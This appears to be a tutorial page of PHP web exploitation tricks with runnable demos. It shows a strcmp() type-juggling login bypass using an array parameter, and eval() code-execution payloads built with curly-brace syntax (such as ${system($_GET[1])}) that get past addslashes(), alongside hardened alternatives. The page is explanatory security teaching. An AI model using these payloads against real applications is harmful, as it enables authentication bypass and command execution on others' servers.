
PHP

Here are some tricks to try in PHP web applications.

Type Juggling

The PHP loose-comparison (==) table is normally shown here as an image, which is not reproduced in this text. The rows that matter for the tricks below: NULL == 0, NULL == "" and NULL == false are all true, and "abc" == 0 is true on PHP 7 (PHP 8 changed string-to-number comparison, so it is false there). Strict comparison (===) does not juggle types, so a == against user input is the first thing to look for.


strcmp(): Vulnerable function

  • Vulnerable code

```php
<?php
// Loose comparison of strcmp()'s return value: anything that makes strcmp()
// return NULL instead of an integer passes the check.
if (strcmp($_POST['password'], $PASS) == 0) {
    // login succeeds
}
?>
```
  • The comparison expects a string (what an HTTP form field normally gives), but we can send an empty array instead: name the field password[] in the form (password[]= in the request body).
  • strcmp(array(), $PASS) then emits a warning and returns NULL instead of an integer (PHP 5 and 7).
  • As the table shows, NULL == 0 is true, so the check passes.
  • Login bypass!
  • Caveat: PHP 8 throws a TypeError when strcmp() receives an array, so this only works on PHP 7 and older. The fix is to reject non-string input and compare with === (or hash_equals() / password_verify()), never with == on strcmp()'s result.
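To see the bypass and its fix side by side, here is an added example (not code from the original page) that simulates three requests from the CLI; $PASS and the request arrays are constructed for the demo, and the TypeError branch covers PHP 8:

```php
<?php
// Added example, not from the original page: strcmp() login check, vulnerable and hardened.
// $PASS and the three simulated POST bodies below are constructed for the demo.

$PASS = 'correct-horse';

// Vulnerable: loose comparison of strcmp()'s result.
// On PHP 5/7, strcmp(array, string) warns and returns NULL, and NULL == 0 is true.
// On PHP 8 the same call throws a TypeError instead.
function vulnerableLogin(array $post, string $pass): bool
{
    return @strcmp($post['password'], $pass) == 0;
}

// Hardened: reject anything that is not a string, then compare in constant time.
function hardenedLogin(array $post, string $pass): bool
{
    if (!isset($post['password']) || !is_string($post['password'])) {
        return false;
    }
    return hash_equals($pass, $post['password']);
}

$requests = [
    'legit'  => ['password' => 'correct-horse'],
    'wrong'  => ['password' => 'wrong'],
    'bypass' => ['password' => []],   // what password[]= produces in $_POST
];

foreach ($requests as $name => $post) {
    try {
        $v = vulnerableLogin($post, $PASS) ? 'allowed' : 'denied';
    } catch (TypeError $e) {
        $v = 'TypeError (PHP 8+)';
    }
    $h = hardenedLogin($post, $PASS) ? 'allowed' : 'denied';
    printf("%-7s vulnerable=%-18s hardened=%s\n", $name, $v, $h);
}
```

On PHP 7 the 'bypass' row shows the vulnerable check allowing the login while the hardened one denies it; on PHP 8 the vulnerable check crashes with a TypeError, which is a denial of service rather than a bypass, and the hardened check is unaffected either way.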

Eval

Anything passed to eval() is executed as PHP, but the injected input sometimes goes through a function that escapes part of it first, and that escaping has to be worked around.

addslashes()

  • addslashes() escapes only a handful of characters. Per the PHP manual:

Quote

Returns a string with backslashes added before characters that need to be escaped. These characters are:

  • single quote (')
  • double quote (")
  • backslash (\)
  • NUL (the NUL byte)
  • Everything else ($, {, }, (, ), . and letters) passes through untouched, so we can build a payload out of those characters using what the PHP manual calls "Complex Syntax" or "Complex Curly Syntax (CCS)": the expression inside ${...} is evaluated to produce a variable name, and a function call placed there still runs.

    • For example, if we have the following code:

    ```php
    <?php
    // addslashes() escapes quotes, backslashes and NUL, nothing else
    $var = addslashes($_GET['param']);
    // schematic sink: some_function() stands for whatever builds the code that eval() runs,
    // with $var spliced straight into it
    eval(some_function("bla" . $var . "blah"));
    ?>
    ```
    

    Info

    If we put something like ); system("id"); // in param, addslashes() turns every quote into \" (or \'), so the quoted argument to system() becomes a syntax error: we cannot pass a string argument to the function the usual way.

    • So, we need CCS to bypass this; below are three examples

      ```php
      # Using chr() to avoid blank spaces and quotes: ls.chr(32).chr(45).la is "ls -la".
      # Bare words are undefined constants, which PHP < 8 casts to strings (with a warning);
      # PHP 8 throws an Error, so this variant needs PHP 7 or older.
      ${(system)(ls.chr(32).chr(45).la)}
      # Using another GET parameter to carry the argument: $_GET[1] needs no quotes because
      # the key is a numeric literal. Request: ?param=${system($_GET[1])}&1=whoami
      ${system($_GET[1])}
      # Or with eval (taken from https://www.programmersought.com/article/30723400042/).
      # Request: ?str=${eval($_GET[1])}&1=phpinfo();
      ${eval($_GET[1])}
      ```
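The following added example (not code from the original page) shows why addslashes() does not stop this. It assumes a hypothetical sink in which the escaped value lands inside a double-quoted PHP string literal (eval('$greeting = "Hello ' . $var . '!";')), which stands in for the page's eval(some_function(...)); $_GET[1] is populated inline so the script runs from the CLI. It also goes one step past the page by building the argument purely from chr() calls, which avoids the bare-word constants that PHP 8 rejects. PHP 8.2+ prints a deprecation notice for ${expr} inside strings but still executes it.

```php
<?php
// Added example, not from the original page: addslashes() guarding an eval() sink.
// The greeting template is an assumed stand-in for the page's schematic sink, and
// $_GET is filled in by hand so the demo runs offline from the CLI.

// Vulnerable sink: quotes are escaped, but "${expr}" interpolation inside the
// double-quoted literal is not, so an expression placed there is evaluated.
function renderGreeting(string $param): string
{
    $var = addslashes($param);
    $greeting = '';
    eval('$greeting = "Hello ' . $var . '!";');
    return $greeting;
}

// Build a chr() chain for $s so the payload needs neither quotes nor spaces,
// e.g. "ls" becomes chr(108).chr(115)
function chrChain(string $s): string
{
    $parts = array_map(function ($c) {
        return 'chr(' . ord($c) . ')';
    }, str_split($s));
    return implode('.', $parts);
}

$_GET[1] = 'echo pwned-via-get';   // constructed: stands in for &1=whoami in the URL

$payloads = [
    // Quote-based injection: addslashes() turns " into \" and it stays inside the literal.
    'quotes'  => '"; system("echo pwned"); "',
    // Complex curly syntax: the expression inside ${...} is evaluated to name a variable,
    // and the side effect (the system() call) happens regardless of that variable.
    'ccs-get' => '${system($_GET[1])}',
    // Same idea with the argument built from chr() only: no $_GET, no bare-word constants.
    'ccs-chr' => '${system(' . chrChain('echo pwned-via-chr') . ')}',
];

foreach ($payloads as $name => $payload) {
    echo "[$name] payload: $payload\n";
    // @ silences the "undefined variable" warning for the variable named by system()'s
    // return value; the command output itself is printed by system() before that.
    $out = @renderGreeting($payload);
    echo "[$name] result:  $out\n\n";
}
```

The 'quotes' payload comes back as a harmless greeting containing the escaped text, while both CCS payloads print the echoed marker before the greeting, showing that the command ran even though every quote in the request was escaped. The defence is not a better escaper: user input must never reach eval() at all.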